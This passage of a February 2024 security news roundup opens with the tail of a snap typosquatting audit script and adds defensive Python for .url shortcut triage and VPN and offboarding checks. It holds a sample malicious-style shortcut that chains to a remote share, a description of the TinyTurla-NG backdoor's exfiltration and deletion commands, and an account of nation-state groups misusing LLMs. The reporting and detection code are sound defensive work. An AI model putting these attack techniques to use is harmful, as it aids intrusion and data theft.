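    if a == b:
        return True
    if abs(len(a) - len(b)) > 1:
        return False
    if len(a) > len(b):
        a, b = b, a                       # make a the shorter string
    i = 0
    while i < len(a) and a[i] == b[i]:
        i += 1                            # skip the common prefix
    if len(a) == len(b):
        return a[i + 1:] == b[i + 1:]     # exactly one substitution
    return a[i:] == b[i + 1:]             # one character inserted into the shorter


def audit_apt_names(apt_commands, snap_registry, trusted):
    """For each APT package name: is the matching snap name held by a trusted
    publisher ("ok"), by someone else ("impersonation"), or by nobody yet
    ("unclaimed", i.e. still available to an attacker)?"""
    report = {}
    for pkg in sorted(set(apt_commands.values())):
        publisher = snap_registry.get(pkg)
        if publisher is None:
            report[pkg] = "unclaimed"
        elif publisher in trusted:
            report[pkg] = "ok"
        else:
            report[pkg] = "impersonation"
    return report


def audit_typed_command(cmd, apt_commands, snap_registry, trusted):
    """Classify what a user who types `cmd` on a system without it is exposed to.

    As the page describes, a snap whose name equals the typed command is
    suggested ahead of the APT package, so an untrusted snap with that name
    is an impersonation when the command is real and a typosquat when the
    command is a near miss of a real one.
    """
    snap_owner = snap_registry.get(cmd)
    untrusted_snap = snap_owner is not None and snap_owner not in trusted
    if cmd in apt_commands:
        return "impersonated" if untrusted_snap else "apt-ok"
    near_miss = any(edit_distance_le_1(cmd, real) for real in apt_commands)
    if near_miss and untrusted_snap:
        return "typosquat"
    return "unknown"


if __name__ == "__main__":
    print(audit_apt_names(APT_COMMANDS, SNAP_REGISTRY, TRUSTED_PUBLISHERS))
    for typed in ("ifconfig", "ifconfigg", "jupyter-notebook", "gti"):
        print(typed, "->", audit_typed_command(typed, APT_COMMANDS, SNAP_REGISTRY, TRUSTED_PUBLISHERS))
```

Run against real data, the "unclaimed" bucket is the 26% figure Aqua describes: names nobody owns yet, which a maintainer can close off simply by registering them.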


Pierluigi Paganini

(SecurityAffairs – hacking, Ubuntu)

Nation-state actors are using AI services and LLMs for cyberattacks

15 February 2024 at 06:54

Microsoft and OpenAI warn that nation-state actors are using ChatGPT to automate some phases of their attack chains, including target reconnaissance and social engineering attacks.

Multiple nation-state actors are exploiting artificial intelligence (AI) and large language models (LLMs), including OpenAI ChatGPT, to automate their attacks and increase their sophistication.

According to a study conducted by Microsoft in collaboration with OpenAI, the two companies identified and disrupted operations conducted by five nation-state actors that abused their AI services to carry out their attacks.

The researchers observed the following APT groups using artificial intelligence (AI) and large language models (LLMs) in various phases of their attack chain:

“Language support is a natural feature of LLMs and is attractive for threat actors with continuous focus on social engineering and other techniques relying on false, deceptive communications tailored to their targets’ jobs, professional networks, and other relationships.” reads the report published by Microsoft. “Importantly, our research with OpenAI has not identified significant attacks employing the LLMs we monitor closely.”

The researchers pointed out that at this time the attackers have yet to use LLMs to devise novel attacks, malicious use of LLMs observed by the researchers include:

  • LLM-informed reconnaissance: Employing LLMs to gather actionable intelligence on technologies and potential vulnerabilities.
  • LLM-enhanced scripting techniques: Utilizing LLMs to generate or refine scripts that could be used in cyberattacks, or for basic scripting tasks such as programmatically identifying certain user events on a system and assistance with troubleshooting and understanding various web technologies.
  • LLM-aided development: Utilizing LLMs in the development lifecycle of tools and programs, including those with malicious intent, such as malware.
  • LLM-supported social engineering: Leveraging LLMs for assistance with translations and communication, likely to establish connections or manipulate targets.
  • LLM-assisted vulnerability research: Using LLMs to understand and identify potential vulnerabilities in software and systems, which could be targeted for exploitation.
  • LLM-optimized payload crafting: Using LLMs to assist in creating and refining payloads for deployment in cyberattacks.
  • LLM-enhanced anomaly detection evasion: Leveraging LLMs to develop methods that help malicious activities blend in with normal behavior or traffic to evade detection systems.
  • LLM-directed security feature bypass: Using LLMs to find ways to circumvent security features, such as two-factor authentication, CAPTCHA, or other access controls.
  • LLM-advised resource development: Using LLMs in tool development, tool modifications, and strategic operational planning.

Microsoft’s report details the use of LLMs by each APT group. For instance, the Iranian nation-state actor Crimson Sandstorm (CURIUM) used the AI services to generate phishing emails and code snippets and to assist in developing code that evades detection.

OpenAI reported that the five APT groups used its services for the following tasks:

  • Charcoal Typhoon used our services to research various companies and cybersecurity tools, debug code and generate scripts, and create content likely for use in phishing campaigns.
  • Salmon Typhoon used our services to translate technical papers, retrieve publicly available information on multiple intelligence agencies and regional threat actors, assist with coding, and research common ways processes could be hidden on a system.
  • Crimson Sandstorm used our services for scripting support related to app and web development, generating content likely for spear-phishing campaigns, and researching common ways malware could evade detection.
  • Emerald Sleet used our services to identify experts and organizations focused on defense issues in the Asia-Pacific region, understand publicly available vulnerabilities, help with basic scripting tasks, and draft content that could be used in phishing campaigns.
  • Forest Blizzard used our services primarily for open-source research into satellite communication protocols and radar imaging technology, as well as for support with scripting tasks.

Microsoft also announced a set of principles shaping its policy and actions to mitigate the risks associated with the abuse of its AI services by nation-state actors, advanced persistent manipulators (APMs), and cybercriminal syndicates.

The principles include identification of and action against malicious threat actors’ use of its services, notification to other AI service providers, collaboration with other stakeholders, and transparency.

Pierluigi Paganini

(SecurityAffairs – AI services, OpenAI ChatGPT)

CISA adds Microsoft Windows bugs to its Known Exploited Vulnerabilities catalog

15 February 2024 at 10:04

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds two Microsoft Windows flaws to its Known Exploited Vulnerabilities catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following two vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog:

  • CVE-2024-21412 Microsoft Windows Internet Shortcut Files Security Feature Bypass Vulnerability
  • CVE-2024-21351 Microsoft Windows SmartScreen Security Feature Bypass Vulnerability

This week, Microsoft released Patch Tuesday security updates for February 2024 that resolved a total of 72 vulnerabilities, including the two above, which are actively exploited in the wild.

Below are the details of the two vulnerabilities:

CVE-2024-21412 (CVSS score 8.1) – Internet Shortcut Files Security Feature Bypass Vulnerability. An unauthenticated attacker can trigger the flaw by sending the victim a specially crafted file that is designed to bypass displayed security checks. The attacker has to trick the victims into clicking the file link. The flaw was reported by:

CVE-2024-21351 (CVSS score 7.6) – Windows SmartScreen Security Feature Bypass Vulnerability. An authorized attacker can trigger the flaw to bypass the SmartScreen user experience. The attacker can exploit the vulnerability by sending a malicious file to the user and convincing them to open it.

Trend Micro researchers reported that the flaw CVE-2024-21412 was used in a zero-day attack chain by the APT group Water Hydra.

A new vulnerability discovered by @thezdi was used in a zero-day attack chain by the APT group Water Hydra.

Watch Trend Micro Sr. Threat Researcher @gothburz share his expert insights on CVE-2024-21412. pic.twitter.com/AZasBtG2Ot

— Trend Micro Research (@TrendMicroRSRCH) February 13, 2024

The popular researcher Will Dormann speculates that CVE-2024-21412 results from the partial fix of the vulnerability CVE-2023-36025. The fix for CVE-2023-36025 didn’t consider the case where a .URL file points to a .URL file, Dormann explained.

Ah, so it looks like CVE-2024-21412 is to address a bypass for CVE-2023-36025, which was the fact that remote targets inside of a ZIP didn't get SmartScreen love. The fix for CVE-2023-36025 didn't consider the case where a .URL file points to a .URL file.https://t.co/SLpw0L7mtY pic.twitter.com/x3lskKmBRi

— Will Dormann (@wdormann) February 13, 2024
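Dormann's observation boils down to two properties of an Internet Shortcut that a mail gateway or triage analyst can check for directly: whether the .URL file's target is on a remote host, and whether that target is itself another .URL file. The following is an added example written for this article, not Microsoft's, Trend Micro's or Will Dormann's code; it parses the INI-style .url format, classifies each shortcut inside a ZIP archive, and the sample archive (including the 203.0.113.10 documentation address) is constructed inline.

```python
"""Triage helper for Internet Shortcut (.url) files.

Added example for this article, not Microsoft's, Trend Micro's or Will
Dormann's code. It flags two things a defender wants to see in mail
attachments: shortcuts whose target is remote (UNC share, file:// with a
host, http/https) and shortcuts that chain to another .url file, the
case Dormann describes. The ZIP archive below is constructed inline.
"""
import configparser
import io
import zipfile
from typing import Dict, List, Optional
from urllib.parse import urlsplit


def parse_internet_shortcut(data: bytes) -> Optional[str]:
    """Return the URL= value from the [InternetShortcut] section, or None.
    .url files are INI text, usually CRLF-terminated, sometimes BOM-prefixed."""
    text = data.decode("utf-8-sig", errors="replace")
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string("\n".join(text.splitlines()))
    except configparser.Error:
        return None
    return cp.get("InternetShortcut", "URL", fallback=None)


def is_remote_target(url: str) -> bool:
    """True when opening the shortcut would fetch from another host."""
    if url.startswith("\\\\"):                  # UNC path: \\host\share\file
        return True
    parts = urlsplit(url)
    if parts.scheme in ("http", "https", "ftp"):
        return True
    # file://host/share/... is remote; file:///C:/... is local
    return parts.scheme == "file" and parts.netloc not in ("", "localhost")


def classify_shortcut(data: bytes) -> Dict[str, object]:
    """Classify one .url file body: its target, whether it is remote,
    and whether the target is itself a .url (a chained shortcut)."""
    url = parse_internet_shortcut(data) or ""
    path = urlsplit(url).path if "://" in url else url
    return {
        "url": url,
        "remote": is_remote_target(url),
        "chained": path.lower().rstrip("/").endswith(".url"),
    }


def scan_zip(archive: bytes) -> List[Dict[str, object]]:
    """Classify every .url member of a ZIP held in memory."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".url"):
                result = classify_shortcut(zf.read(info))
                result["member"] = info.filename
                findings.append(result)
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample: a local shortcut, and a shortcut on a remote share
    whose target is itself a .url file. 203.0.113.10 is a documentation address."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("notes.url", "[InternetShortcut]\r\nURL=file:///C:/Users/Public/notes.txt\r\n")
        zf.writestr("invoice.url", "[InternetShortcut]\r\nURL=file://203.0.113.10/share/invoice.url\r\n")
        zf.writestr("readme.txt", "plain text, ignored")
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_zip(build_sample_zip()):
        verdict = "REVIEW" if f["remote"] or f["chained"] else "ok"
        print(f"{f['member']}: {verdict} remote={f['remote']} chained={f['chained']} -> {f['url']}")
```

The "chained" flag is the property the fix for CVE-2023-36025 missed according to Dormann; a remote target alone is already a strong reason to quarantine an attachment, since it means the payload is fetched from outside the organization at click time.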

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts also recommend that private organizations review the catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix these vulnerabilities by March 5, 2024.

Pierluigi Paganini

(SecurityAffairs – Hacking, Known Exploited Vulnerabilities catalog)

North Korea-linked actors breached the emails of a Presidential Office member

15 February 2024 at 15:22

The office of South Korean President Yoon Suk Yeol said that North Korea-linked actors breached the personal emails of one of his staff members.

The office of South Korean President Yoon Suk Yeol announced a security incident involving the compromise of personal emails belonging to a member of the presidential staff. The government attributes the security breach to North Korean threat actors. The attackers had access to the personal emails of the staff member ahead of Yoon’s trip to Europe in November 2023.

The office of the South Korean President explained that the compromise of the account occurred due to the staff member utilizing commercial email services for official responsibilities.

At this time it’s unclear what kind of information was exposed; however, Yoon’s office pointed out that the threat actors did not compromise the office’s overall security system.

“We detected the case in advance of (Yoon’s) visit and took necessary measures,” Yoon’s office said in a statement to reporters, according to the Associated Press. The office said it has been monitoring and defending against “constant” hacking attempts presumed to be related to North Korea but “it’s not that the presidential office’s security system got hacked.”

South Korea is a privileged target of cyber espionage operations carried out by North Korea-linked APT groups.

North Korea-linked APT groups are also known to focus on attacks against cryptocurrency exchanges and financial organizations in South Korea.

Recently, a U.N. panel of experts announced an investigation into 58 suspected North Korean cyberattacks between 2017 and 2023 valued at approximately $3 billion.

Pierluigi Paganini

(SecurityAffairs – hacking, North Korea)

A cyberattack halted operations at Varta production plants

15 February 2024 at 18:43

On February 12, 2024, a cyber attack halted operations at five production plants of German battery manufacturer Varta.

On February 13, German battery manufacturer Varta announced that a cyber attack forced the company to shut down IT systems. The attack disrupted operations at five production plants and the administration.

VARTA AG is a leading global manufacturer of batteries with over 4,500 employees worldwide, reporting revenue of €1.2 billion in 2023.

The announcement revealed that the company has temporarily shut down its systems to contain the threat, a circumstance that suggests it was the victim of a ransomware attack.

The company launched an investigation into the incident, with the help of forensics experts, to determine its scope.

“Last night, February 12th 2024, the VARTA Group was the target of a cyber attack on parts of its IT systems. This affects the five production plants and the administration. The IT systems and thus also production were proactively shut down temporarily for security reasons and disconnected from the internet. The IT systems and the extent of the impact are currently being reviewed. The utmost care is being taken to ensure data integrity. The extent of the actual damage cannot be determined at this time. In accordance with the emergency plan for such situations, the necessary precautionary measures were implemented immediately.” reads the statement published by the company. “Additionally, a task force was set up instantly to restore normal operations as quickly as possible and deal with the incident with the support of cyber security experts and data forensics specialists.”

The impacted production plants are in Germany, Romania and Indonesia; as of February 14, operations at the plants were still halted.

“The battery manufacturer’s production continues to stand still after a hacker attack. A spokesman for the company from Ellwangen in Baden-Württemberg told the German Press Agency on Wednesday afternoon upon request. The five production sites, three of them in Germany and one each in Romania and Indonesia, are affected. Likewise the administration.” reported the German website Finanzen.

At this time, no known ransomware group has claimed responsibility for the attack.

Pierluigi Paganini

(SecurityAffairs – hacking, Varta)

US Gov dismantled the Moobot botnet controlled by Russia-linked APT28

15 February 2024 at 19:40

The US authorities dismantled the Moobot botnet, which was controlled by the Russia-linked cyberespionage group APT28.

A court order allowed US authorities to neutralize the Moobot botnet, a network of hundreds of small office/home office (SOHO) routers under the control of the Russia-linked group APT28.

The botnet was used by the Russian state-sponsored hackers to carry out a broad range of attacks.

“A January 2024 court-authorized operation has neutralized a network of hundreds of small office/home office (SOHO) routers that GRU Military Unit 26165, also known as APT28, Sofacy Group, Forest Blizzard, Pawn Storm, Fancy Bear, and Sednit, used to conceal and otherwise enable a variety of crimes.” reads the press release published by DoJ. “These crimes included vast spearphishing and similar credential harvesting campaigns against targets of intelligence interest to the Russian government, such as U.S. and foreign governments and military, security, and corporate organizations. In recent months, allegations of Unit 26165 activity of this type has been the subject of a private sector cybersecurity advisory and a Ukrainian government warning.”

The Moobot botnet was composed of hundreds of compromised Ubiquiti Edge OS routers; it was initially created by a known cyber criminal group and later controlled by the Russia-linked APT group.

The Mirai-based Moobot botnet was first documented by Palo Alto Unit 42 researchers in February 2021; in November 2021 it started exploiting a critical command injection flaw (CVE-2021-36260) in the web server of several Hikvision products. Since September 2022, the Moobot botnet has been spotted targeting vulnerable D-Link routers.

In April 2023, FortiGuard Labs researchers observed a hacking campaign targeting Cacti (CVE-2022-46169) and Realtek (CVE-2021-35394) vulnerabilities to spread ShellBot and Moobot malware.

The court order allowed authorities to use the Moobot malware to copy and delete stolen and malicious data and files from compromised routers. The US government operation blocked access to the routers by Russian cyberspies. The operation reversibly modified the routers’ firewall rules to block remote management access to the devices.

“The Department’s court-authorized operation leveraged the Moobot malware to copy and delete stolen and malicious data and files from compromised routers.” continues the press release. “Additionally, in order to neutralize the GRU’s access to the routers until victims can mitigate the compromise and reassert full control, the operation reversibly modified the routers’ firewall rules to block remote management access to the devices, and during the course of the operation, enabled temporary collection of non-content routing information that would expose GRU attempts to thwart the operation.”

According to court documents, the government extensively tested the operation on the relevant Ubiquiti Edge OS routers. The DoJ pointed out that apart from hindering the GRU’s ability to access the routers, the operation did not affect the routers’ normal functionality or gather legitimate user content information. The court order also allowed the authorities to disconnect the routers from the Moobot network; users can revert the firewall rule changes by performing factory resets of their routers or accessing their routers through the local network.

Pierluigi Paganini

(SecurityAffairs – hacking, Moobot botnet)

Russia-linked Turla APT uses new TinyTurla-NG backdoor to spy on Polish NGOs

16 February 2024 at 08:05

Russia-linked APT group Turla has been spotted targeting Polish non-governmental organizations (NGO) with a new backdoor dubbed TinyTurla-NG.

Russia-linked cyberespionage group Turla has been spotted using a new backdoor dubbed TinyTurla-NG in attacks aimed at Polish non-governmental organizations.

The Turla APT group (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has been active since at least 2004 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

Cisco Talos researchers reported that “TinyTurla-NG” (TTNG) is similar to Turla’s implant TinyTurla.

TinyTurla-NG was spotted in early December 2023, it was employed in attacks targeting NGOs working on improving Polish democracy and supporting Ukraine during the Russian invasion.

“Talos assesses with high confidence that TinyTurla-NG, just like TinyTurla, is a small “last chance” backdoor that is left behind to be used when all other unauthorized access/backdoor mechanisms have failed or been detected on the infected systems.” reads the report published by Cisco Talos.

Talos also discovered previously undetected PowerShell scripts dubbed “TurlaPower-NG” that were designed for data exfiltration. Turla operators used the scripts to exfiltrate keys used to secure the password databases of popular password management software.

The cybersecurity firm identified three different TinyTurla-NG samples and gained access to two of them. This latest campaign began at least on December 18, 2023, and was still active as recently as January 27, 2024. Evidence gathered by the experts suggests that the campaign may have begun as early as November 2023.

Turla operators used compromised WordPress websites as C2 for the TinyTurla-NG backdoor. The threat actors compromised websites running vulnerable versions of the popular CMS, including 4.4.20, 5.0.21, 5.1.18 and 5.7.2, and uploaded PHP files containing the C2 code with names such as rss-old[.]php, rss[.]old[.]php or block[.]old[.]php.

Since the beginning of the campaign, the attackers used various C2 servers to host PowerShell scripts and arbitrary commands that could be executed on the victim’s machine.

Like TinyTurla, TinyTurla-NG operates as a service DLL initiated through svchost.exe. The malware uses Windows events for synchronization, with the first primary malware thread initiated in the DLL’s ServiceMain function.

The malware supports the following commands:

  • “changeshell”: This command will instruct the backdoor to switch the current shell being used to execute commands, i.e., from cmd.exe to PowerShell.exe, or vice versa.
  • “changepoint”: This command is used to likely tell the implant to switch to the second C2 URL present in the implant.
  • “get”: Fetch a file specified by the C2 using an HTTP GET request and write it to the specified location on disk.
  • “post”: Exfiltrate a file from the victim to the C2, e.g., post C:\some_file.bin.
  • “killme”: Create a BAT file (see below) with a name based on the current tick count. Then, use the BAT file to delete a file from the disk of the victim machine, e.g., killme <filename>. The BAT file is executed via cmd.exe /c <BAT-file-name>.bat

The report includes indicators of compromise (IoCs).

Pierluigi Paganini

(SecurityAffairs – hacking, Turla)

U.S. CISA: hackers breached a state government organization

16 February 2024 at 12:04

U.S. CISA revealed that threat actors breached an unnamed state government organization via an administrator account belonging to a former employee.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed that a threat actor gained access to an unnamed state government organization’s network environment via an administrator account belonging to a former employee.

CISA and the Multi-State Information Sharing & Analysis Center (MS-ISAC) published a joint Cybersecurity Advisory (CSA) to provide network defenders with the tactics, techniques, and procedures (TTPs) utilized by a threat actor.

The government experts conducted an incident response assessment of the state government organization after its documents were posted on the dark web. The threat actor compromised network administrator credentials through the account of a former employee, which was used to successfully authenticate to an internal virtual private network (VPN) access point. The attackers then moved laterally and executed various lightweight directory access protocol (LDAP) queries against a domain controller. The government organization also hosts its sensitive data in an Azure environment, which was not accessed by the attackers.

“The logs revealed the threat actor first connected from an unknown virtual machine (VM) to the victim’s on-premises environment via internet protocol (IP) addresses within their internal VPN range. CISA and MS-ISAC assessed that the threat actor connected to the VM through the victim’s VPN with the intent to blend in with legitimate traffic to evade detection.” reads the report published by CISA.

The threat actor likely obtained the employee’s account credentials from a third-party data breach.

The threat actor likely obtained the account credentials of a second user from the virtualized SharePoint server managed by the first user. Neither of the two administrative accounts had multifactor authentication (MFA) enabled.

CISA pointed out that the victim confirmed that the administrator credentials for the second user were stored locally on this server.

Access to the virtualized SharePoint server enabled threat actors to also acquire a separate set of credentials stored on the server, granting administrative privileges to both the on-premises network and Azure Active Directory.
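The three control failures the advisory describes (a former employee's administrator account left enabled, privileged accounts without MFA, and a VPN login from that account blending in with internal traffic) can all be checked mechanically. The following is an added example written for this article, not CISA's or MS-ISAC's code; the account inventory and the syslog-style VPN lines are constructed, and in a real environment they would come from the HR system, the directory and the VPN concentrator.

```python
"""Offboarding and MFA audit over constructed data.

Added example for this advisory summary, not CISA's or MS-ISAC's code.
The account records and VPN log lines below are constructed; in practice
the inventory comes from HR plus the directory, the log from the VPN
concentrator.
"""
import re
from datetime import date

TODAY = date(2024, 1, 10)  # constructed reference date for the audit

# Constructed account inventory. left_on is the HR termination date, if any.
ACCOUNTS = [
    {"user": "jdoe",   "enabled": True,  "admin": True,  "mfa": False, "left_on": date(2023, 9, 30)},
    {"user": "asmith", "enabled": True,  "admin": True,  "mfa": False, "left_on": None},
    {"user": "bwong",  "enabled": True,  "admin": False, "mfa": True,  "left_on": None},
    {"user": "cjones", "enabled": False, "admin": True,  "mfa": False, "left_on": date(2022, 1, 15)},
]

# Constructed VPN concentrator log lines (documentation IP ranges).
VPN_LOG = """\
2024-01-10T02:14:07Z vpn01 auth: user=jdoe src=198.51.100.23 result=success assigned=10.10.8.14
2024-01-10T08:02:51Z vpn01 auth: user=bwong src=203.0.113.77 result=success assigned=10.10.8.15
2024-01-10T08:05:12Z vpn01 auth: user=asmith src=203.0.113.90 result=failure
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) \S+ auth: user=(?P<user>\S+) src=(?P<src>\S+) result=(?P<result>\w+)"
)


def audit_accounts(accounts=ACCOUNTS, today=TODAY):
    """Return (user, finding) pairs for the two inventory-level failures:
    a departed user whose account is still enabled, and an enabled
    privileged account with no MFA enforced."""
    findings = []
    for a in accounts:
        if a["left_on"] and a["left_on"] < today and a["enabled"]:
            findings.append((a["user"], "departed-user-still-enabled"))
        if a["enabled"] and a["admin"] and not a["mfa"]:
            findings.append((a["user"], "privileged-without-mfa"))
    return findings


def audit_vpn(log_text=VPN_LOG, accounts=ACCOUNTS):
    """Return (timestamp, user, source) for successful VPN logins by any
    account whose owner has left: these should never happen, so a single
    hit is worth an incident ticket regardless of the source address."""
    departed = {a["user"] for a in accounts if a["left_on"]}
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and m["result"] == "success" and m["user"] in departed:
            hits.append((m["ts"], m["user"], m["src"]))
    return hits


if __name__ == "__main__":
    for user, finding in audit_accounts():
        print(f"inventory: {user}: {finding}")
    for ts, user, src in audit_vpn():
        print(f"vpn: {ts} departed user {user} logged in from {src}")
```

Correlating the VPN log against the HR termination list is the step that would have surfaced this intrusion at first login; the directory-only checks are the preventive side, and both are cheap enough to run on a schedule.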

The report includes a lot of interesting details about the threat actor’s activity along with mitigations in accordance with the Cross-Sector Cybersecurity Performance Goals (CPGs) established by CISA and the National Institute of Standards and Technology (NIST), which are recommended to all critical infrastructure entities and network defenders.

CISA did not attribute the attack to a specific threat actor.

Pierluigi Paganini

(SecurityAffairs – hacking, CISA)

US gov offers a reward of up to $10M for info on ALPHV/Blackcat gang leaders

16 February 2024 at 18:48

The U.S. government offers rewards of up to $10 million for information that could lead to the identification or location of ALPHV/Blackcat ransomware gang leaders.

The U.S. Department of State is offering a reward of up to $10 million for information leading to the identification or location of the key figures behind the ALPHV/Blackcat ransomware operation. The US government is also offering up to $5 million for information leading to the arrest and/or conviction, in any country, of any individual conspiring to participate in or attempting to participate in ALPHV/Blackcat ransomware attacks.

This additional reward targets the affiliates and initial access brokers that facilitated the group’s attacks.

BlackCat/ALPHV ransomware gang has been active since November 2021; the list of its victims is long and includes industrial explosives manufacturer SOLAR INDUSTRIES INDIA, the US defense contractor NJVC, gas pipeline Creos Luxembourg S.A., the fashion giant Moncler, Swissport, NCR, and Western Digital. The ransom demands of the group range from a few tens of thousands of dollars up to tens of millions of dollars.

On December 19, 2023, the FBI seized the Tor leak site of the AlphV/Blackcat ransomware group and replaced the home page with the announcement of the seizure.

On December 7th, BleepingComputer and other prominent experts reported that the ALPHV gang’s websites went offline.

On December 10th, the primary domain of the group went offline and administrators claimed the problem was caused by a hardware failure. At the same time, rumors circulated that the site was taken offline as a result of law enforcement’s operation. The group always denied this circumstance, but today the domain displayed the following message to the visitors.

The seizure is the result of a joint operation conducted by international law enforcement agencies from the US, Denmark, Germany, UK, Netherlands, Australia, Spain, Austria and Europol.

“This action has been taken in coordination with the United States Attorney’s Office for the Southern District of Florida and the Computer Crime and Intellectual Property Section of the Department of Justice with substantial assistance from Europol and Zentrale Kriminalinspektion Göttingen.” reads the message published by law enforcement on the seized websites.

AlphV/Blackcat ransomware group leak site

“The Justice Department announced today a disruption campaign against the Blackcat ransomware group — also known as ALPHV or Noberus — that has targeted the computer networks of more than 1,000 victims and caused harm around the world since its inception, including networks that support U.S. critical infrastructure.” reads the press release published by DoJ.

The ALPHV/Blackcat group was the second most prolific ransomware-as-a-service operation; it amassed hundreds of millions of dollars in ransom payments.

The FBI developed a decryption tool that could allow over 500 victims to recover their systems for free.

“FBI identified ALPHV/Blackcat actors as having compromised over 1,000 victim entities in the United States and elsewhere, including prominent government entities (e.g., municipal governments, defense contractors, and critical infrastructure organizations).” reads the press release. “To date, the FBI has worked with dozens of victims in the United States and internationally to disseminate a decryption tool to restore victim systems and prevent ransom demand payments of approximately $99 million.”

According to the press release published by the U.S. Department of State, ALPHV/Blackcat actors have compromised over 1,000 victim entities in the United States and elsewhere.

People who have information eligible for the reward can access the following Tor website set up by the US Department of State: he5dybnt7sr6cm32xt77pazmtm65flqy6irivtflruqfc5ep7eiodiad.onion

Pierluigi Paganini

(SecurityAffairs – hacking, ALPHV/Blackcat ransomware)

CISA adds Microsoft Exchange and Cisco ASA and FTD bugs to its Known Exploited Vulnerabilities catalog

16 February 2024 at 19:36

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Exchange and Cisco ASA and FTD bugs to its Known Exploited Vulnerabilities catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following two vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog:

  • CVE-2020-3259 Cisco ASA and FTD Information Disclosure Vulnerability
  • CVE-2024-21410 Microsoft Exchange Server Privilege Escalation Vulnerability

The vulnerability CVE-2020-3259 is an information disclosure issue that resides in the web services interface of ASA and FTD. Cisco addressed the flaw in May 2020.

The vulnerability CVE-2024-21410 is an elevation of privilege issue in Microsoft Exchange Server. An attacker who obtains a victim’s leaked NTLM credentials can relay them against the Exchange server to gain the victim’s privileges and perform operations on the server on the victim’s behalf.

“An attacker could target an NTLM client such as Outlook with an NTLM credentials-leaking type vulnerability. The leaked credentials can then be relayed against the Exchange server to gain privileges as the victim client and to perform operations on the Exchange server on the victim’s behalf. For more information about Exchange Server’s support for Extended Protection for Authentication(EPA), please see Configure Windows Extended Protection in Exchange Server.” reads the advisory published by Microsoft.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts also recommend that private organizations review the catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix these vulnerabilities by March 7, 2024.

Pierluigi Paganini

(SecurityAffairs – Hacking, Known Exploited Vulnerabilities catalog)

CISA: Cisco ASA/FTD bug CVE-2020-3259 exploited in ransomware attacks

17 February 2024 at 10:45

CISA warns that the Akira Ransomware gang is exploiting the Cisco ASA/FTD vulnerability CVE-2020-3259 (CVSS score: 7.5) in attacks in the wild.

This week the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Cisco ASA and FTD bug, tracked as CVE-2020-3259 (CVSS score: 7.5), to its Known Exploited Vulnerabilities catalog.

The vulnerability CVE-2020-3259 is an information disclosure issue that resides in the web services interface of ASA and FTD. Cisco addressed the flaw in May 2020.

The issue was listed by CISA as known to be used in ransomware campaigns, but the agency did not reveal which ransomware groups are actively exploiting the issue.

In January, researchers from cybersecurity firm Truesec reported that the Akira ransomware group exploited the vulnerability in attacks targeting Cisco ASA and FTD appliances.

“During the past weeks, the Truesec CSIRT team found forensic data indicating that the Akira Ransomware group might be actively exploiting an old Cisco ASA (Adaptive Security Appliance) and FTD (Firepower Threat Defence) vulnerability tracked as CVE-2020-3259.” reads the report published by Truesec.

An attacker can trigger the vulnerability to extract sensitive data from the memory of the affected devices, including usernames and passwords.

The researchers analyzed eight incidents involving the Akira ransomware and confirmed that the flaw in Cisco AnyConnect SSL VPN was the entry point in at least six of the compromised devices.

“When the vulnerability was made public in 2020, no known public exploits were available. However, there are now indications that this vulnerability might be actively exploited.” continues the report.

The Akira ransomware has been active since March 2023; the threat actors behind the malware claim to have already hacked multiple organizations in multiple industries, including education, finance, and real estate. Like other ransomware gangs, the group has developed a Linux encryptor to target VMware ESXi servers.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts also recommend that private organizations review the catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix the vulnerability CVE-2020-3259 by March 7, 2024.

Pierluigi Paganini

(SecurityAffairs – hacking, CISA)

Ukrainian national faces up to 20 years in prison for his role in Zeus, IcedID malware schemes

17 February 2024 at 16:38

A Ukrainian national pleaded guilty to his role in the Zeus and IcedID operations, which caused tens of millions of dollars in losses.

Ukrainian national Vyacheslav Igorevich Penchukov has pleaded guilty to his key roles in the Zeus and IcedID malware operations.

“Vyacheslav Igorevich Penchukov was a leader of two prolific malware groups that infected thousands of computers with malicious software. These criminal groups stole millions of dollars from their victims and even attacked a major hospital with ransomware, leaving it unable to provide critical care to patients for over two weeks,” said Acting Assistant Attorney General Nicole M. Argentieri of the Justice Department’s Criminal Division. “Before his arrest and extradition to the United States, the defendant was a fugitive on the FBI’s most wanted list for nearly a decade. Today’s guilty pleas should serve as a clear warning: the Justice Department will never stop in its pursuit of cybercriminals.”

In October 2022, Swiss police arrested Penchukov, also known as Tank, in Geneva; he is one of the leaders of the JabberZeus cybercrime group.

The man was extradited to the United States in 2023; he had been on the FBI’s “Most Wanted” list and sought for 10 years.

Zeus Penchukov FBI wanted

